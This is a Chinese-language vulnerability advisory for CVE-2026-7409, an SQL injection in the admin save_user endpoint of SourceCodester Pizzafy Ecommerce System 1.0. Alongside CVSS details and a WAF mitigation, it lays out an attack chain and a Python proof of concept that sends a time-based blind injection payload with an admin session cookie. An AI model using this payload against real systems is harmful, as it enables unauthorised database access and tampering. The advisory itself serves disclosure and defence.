CVE-2026-7409 CVSS 4.7 中危

CVE-2026-7409 SourceCodester Pizzafy SQL注入漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7409

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Pizzafy Ecommerce System 1.0

漏洞概述

SourceCodester Pizzafy Ecommerce System 1.0版本中存在安全漏洞。该漏洞位于/admin/ajax.php文件的save_user函数中，由于对用户输入处理不当，导致SQL注入漏洞。攻击者可远程发起攻击，且无需用户交互。尽管需要高权限才能利用，但鉴于利用代码已公开，该漏洞对系统的机密性、完整性和可用性构成潜在威胁。

技术细节

该漏洞源于SourceCodester Pizzafy电商系统后台管理模块的save_user接口未对传入参数进行有效的安全过滤。当系统处理通过/admin/ajax.php?action=save_user提交的请求时，攻击者可构造恶意的SQL语句作为参数值。由于CVSS向量显示攻击复杂度低且无需用户交互，拥有高权限账户的攻击者可轻易利用此漏洞。成功的攻击将导致数据库信息泄露、数据被篡改或删除，进而影响系统的正常运行。目前已存在公开的利用代码，增加了被攻击的风险。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在运行SourceCodester Pizzafy Ecommerce System 1.0。

STEP 2

获取权限

攻击者通过钓鱼或其他手段获取了系统的高权限管理员账户凭证（由于PR:H要求）。

STEP 3

构造载荷

攻击者针对/admin/ajax.php?action=save_user接口构造包含恶意SQL语句的POST请求数据。

STEP 4

执行攻击

攻击者发送恶意请求，服务器后端未过滤直接执行SQL语句，导致数据库被非法操作。

STEP 5

达成目标

成功窃取敏感数据、篡改数据库内容或破坏服务可用性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests # Target URL configuration target_url = "http://target-ip/admin/ajax.php?action=save_user" # Headers to mimic a legitimate browser request headers = { "Content-Type": "application/x-www-form-urlencoded", "Cookie": "PHPSESSID=admin_session_id" # Requires High Privilege (Admin Session) } # Malicious payload testing for SQL Injection # Example: Testing for time-based blind injection in a vulnerable parameter payload_data = { "username": "admin' AND SLEEP(5)-- -", "email": "[email protected]", "password": "password", "save_user": "Submit" } try: response = requests.post(target_url, data=payload_data, headers=headers, timeout=10) # Check if the response time indicates a successful delay (SQL Injection) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability Confirmed: SQL Injection caused a delay.") else: print("[-] Vulnerability not detected or payload incorrect.") except Exception as e: print(f"[!] Error during request: {e}")

影响范围

SourceCodester Pizzafy Ecommerce System 1.0

防御指南

临时缓解措施

在未升级补丁前，建议在Web应用防火墙（WAF）中添加针对特定路径/admin/ajax.php的SQL注入防护规则，并严格限制管理员后台的访问来源IP地址。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7409
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7409
3 Details https://www.cvedetails.com/cve/CVE-2026-7409/
4 VulDB https://vuldb.com/cve/CVE-2026-7409
5 Link https://github.com/r3ng4f/Pizzafy_1/blob/main/03-exploit.md
6 Link https://vuldb.com/submit/803624
7 Link https://vuldb.com/vuln/360143
8 Link https://vuldb.com/vuln/360143/cti
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表